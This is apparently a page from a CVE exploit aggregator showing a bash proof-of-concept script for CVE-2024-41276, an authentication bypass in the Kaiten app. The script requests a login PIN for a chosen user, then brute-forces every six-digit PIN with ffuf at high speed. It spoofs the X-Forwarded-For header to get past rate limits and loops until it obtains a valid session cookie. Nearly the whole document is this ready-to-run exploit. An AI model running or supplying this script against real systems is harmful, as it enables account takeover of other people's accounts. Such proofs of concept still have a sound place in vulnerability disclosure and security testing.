4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-41276
README.md
Rendering markdown...
POC / CVE-2024-41276.sh SH
⬇ Raw GitHub ✕ Close 
#!/bin/bash

# Function to display usage
usage() {
  echo "Usage: $0 <username> <domain>"
  exit 1
}

# Check if username and domain are provided
if [ -z "$1" ] || [ -z "$2" ]; then
  usage
fi

USERNAME=$1
DOMAIN=$2

# Display banner
banner() {
  echo -e "\e[1;33m======================================================================"
  echo -e "CVE-2024-41276 \e[1;31m(Authentication Bypass in Kaiten)\e[0m"
  echo -e "\e[1;33mAttempting to guess the PIN code every 5 minutes"
  echo -e "Rate limit Bypassed with the \e[1;32mX-Forwarded-For\e[1;33m header."
  echo -e "Approx time of success: With \e[1;36m150 RPS ~ 4 hours\e[1;33m"
  echo -e "Result: \e[1;35mObtain a valid cookie.\e[0m"
  echo -e "\e[1;33m======================================================================\e[0m"
}

# Function to request a new PIN
request_pin() {
  echo "Requesting new PIN for user $USERNAME at domain $DOMAIN..."
  response=$(curl --path-as-is -s -k -X $'POST' \
      -H $"Host: $DOMAIN" -H $'Content-Length: 23' -H $'Sec-Ch-Ua: \"Google Chrome\";v=\"125\", \"Chromium\";v=\"125\", \"Not.A/Brand\";v=\"24\"' -H $'Accept: application/json, text/plain, */*' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Content-Type: application/json' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36' -H $'App-Version: 57.128.8' -H $"Origin: https://$DOMAIN" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $"Referer: https://$DOMAIN/login?redirectPath=%2F" -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept-Language: en-US,en;q=0.9' -H $'Priority: u=1, i' \
      -b $'connect.sid=s%3AMyHUxWALORASHD2eThTC8DRQNyDerlOS.oLlEUVqIBxjnInAluztpUAq3z3pzNYBGW5HaVAH05TU' \
      --data-binary $"{"username":"$USERNAME"}" \
      $"https://$DOMAIN/login?redirectPath=%2F")
  
  if [[ "$response" == *"not found"* ]]; then
    echo "User does not exist."
    exit 1
  fi
}

# Function to brute force the PIN
# Timeout of 5 minutes because of expiration_time of cookie = 5 min, then we need to request again new PIN
brute_force_pin() {
  echo "Starting brute force attack for user $USERNAME at domain $DOMAIN..."
  timeout 5m ffuf -noninteractive -w /usr/share/seclists/Fuzzing/6-digits-000000-999999.txt -u $"https://$DOMAIN/pin" -X POST -H $"Cookie: connect.sid=s%3AMyHUxWALORASHD2eThTC8DRQNyDerlOS.oLlEUVqIBxjnInAluztpUAq3z3pzNYBGW5HaVAH05TU" -H "Content-Type: application/json" -H $"X-Forwarded-For: 127.0.0.FUZZ" -d $"{"username":"$USERNAME","pin":"FUZZ"}" -mc 200-299,301,302,307,405 -rate 1000 -t 500 -of json -o ffuf_kaiten.json
}

# Function to check the output of ffuf
check_output() {
  if jq -e '.results | length > 0' ffuf_kaiten.json > /dev/null; then
    echo "Valid PIN found!"
    cat ffuf_kaiten.json | jq '.results'
    exit 0
  else
    echo "No valid PIN found, restarting the process..."
  fi
}

# Main loop
banner
while true; do
  request_pin
  brute_force_pin
  check_output
done